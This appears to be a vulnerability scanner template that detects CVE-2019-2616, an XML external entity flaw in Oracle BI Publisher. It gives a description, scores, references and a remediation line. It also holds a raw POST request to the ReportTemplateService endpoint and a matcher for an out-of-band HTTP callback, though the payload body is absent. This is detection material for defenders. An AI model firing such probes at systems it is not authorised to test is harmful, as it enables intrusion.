id: CVE-2019-2616 info: name: Oracle Business Intelligence/XML Publisher - XML External Entity Injection author: pdteam severity: high description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/46729 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 epss-score: 0.94746 epss-percentile: 0.98945 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: business_intelligence_publisher tags: cve,cve2019,oracle,xxe,oast,kev,edb http: - raw: - | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"